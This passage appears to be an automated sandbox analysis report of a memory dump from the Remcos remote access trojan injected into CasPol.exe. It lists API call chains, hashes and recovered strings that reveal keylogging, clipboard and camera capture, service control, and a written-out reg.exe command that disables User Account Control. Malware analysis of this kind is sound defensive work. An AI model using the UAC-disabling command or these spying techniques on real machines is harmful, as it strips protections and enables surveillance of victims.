                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Console$AllocOutputShowWindow
                                                                                                            • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                            • API String ID: 2425139147-2527699604
                                                                                                            • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                            • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                                                                                                            • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                            • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
                                                                                                            • API String ID: 0-3292752334
                                                                                                            • Opcode ID: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
                                                                                                            • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                            • Opcode Fuzzy Hash: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
                                                                                                            • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                                                                                                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                                                                                                            • Sleep.KERNEL32(00002710), ref: 00419F89
                                                                                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                            • String ID: Alarm triggered$`#v
                                                                                                            • API String ID: 614609389-3049340936
                                                                                                            • Opcode ID: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
                                                                                                            • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                                                                                                            • Opcode Fuzzy Hash: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
                                                                                                            • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                                                                                                            APIs
                                                                                                            • __allrem.LIBCMT ref: 00439799
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                                                                                            • __allrem.LIBCMT ref: 004397CC
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                                                                                            • __allrem.LIBCMT ref: 00439801
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 1992179935-0
                                                                                                            • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                            • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                                                                                                            • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                            • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __cftoe
                                                                                                            • String ID:
                                                                                                            • API String ID: 4189289331-0
                                                                                                            • Opcode ID: dd2f1bd308eb93d0c4e5b61de7cd89d13f43cbfcc6682a20ed2fda671c880afe
                                                                                                            • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                                                                                                            • Opcode Fuzzy Hash: dd2f1bd308eb93d0c4e5b61de7cd89d13f43cbfcc6682a20ed2fda671c880afe
                                                                                                            • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prologSleep
                                                                                                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                            • API String ID: 3469354165-462540288
                                                                                                            • Opcode ID: aa6c569e894ef081ae3a77e9f9792835c9671d76e7273c9a8ca675ac56314457
                                                                                                            • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                                                                                                            • Opcode Fuzzy Hash: aa6c569e894ef081ae3a77e9f9792835c9671d76e7273c9a8ca675ac56314457
                                                                                                            • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 493672254-0
                                                                                                            • Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                                                            • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                                                                                                            • Opcode Fuzzy Hash: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                                                            • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                                                                                                            • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852720340-0
                                                                                                            • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                                            • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                                                                                                            • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                                            • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                            • _free.LIBCMT ref: 00446F06
                                                                                                            • _free.LIBCMT ref: 00446F2E
                                                                                                            • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                                                                                                            • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                            • _abort.LIBCMT ref: 00446F4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160817290-0
                                                                                                            • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                                                            • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                                                                                                            • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                                                            • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                                                            • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                                                                                                            • Opcode Fuzzy Hash: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                                                            • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                                                                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                                                            • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                                                                                                            • Opcode Fuzzy Hash: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                                                            • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                                                                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                                                            • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                                                                                                            • Opcode Fuzzy Hash: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                                                            • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                                                                                                            APIs
                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Enum$InfoQueryValue
                                                                                                            • String ID: [regsplt]$DG
                                                                                                            • API String ID: 3554306468-1089238109
                                                                                                            • Opcode ID: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
                                                                                                            • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                                                                                                            • Opcode Fuzzy Hash: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
                                                                                                            • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                            APIs
                                                                                                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                                                                                            • API String ID: 2974294136-4018440003
                                                                                                            • Opcode ID: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
                                                                                                            • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                                                                                                            • Opcode Fuzzy Hash: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
                                                                                                            • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                            • wsprintfW.USER32 ref: 0040A905
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EventLocalTimewsprintf
                                                                                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                            • API String ID: 1497725170-248792730
                                                                                                            • Opcode ID: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
                                                                                                            • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                                                                                            • Opcode Fuzzy Hash: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
                                                                                                            • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                            • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandleSizeSleep
                                                                                                            • String ID: `AG
                                                                                                            • API String ID: 1958988193-3058481221
                                                                                                            • Opcode ID: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                                                                                                            • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                            • Opcode Fuzzy Hash: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                                                                                                            • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                            APIs
                                                                                                            • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                            • GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                            • String ID: 0$MsgWindowClass
                                                                                                            • API String ID: 2877667751-2410386613
                                                                                                            • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                            • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                                                                                            • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                            • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                            Strings
                                                                                                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                            • API String ID: 2922976086-4183131282
                                                                                                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                            • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                                                                                                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                            • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                                                                                                            APIs
                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002), ref: 00442609
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000), ref: 0044263F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                            • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                                                                                                            • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                            • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                                                                                                            APIs
                                                                                                            • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                            • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValue
                                                                                                            • String ID: pth_unenc$BG
                                                                                                            • API String ID: 1818849710-2233081382
                                                                                                            • Opcode ID: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                                                                                                            • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                            • Opcode Fuzzy Hash: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                                                                                                            • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
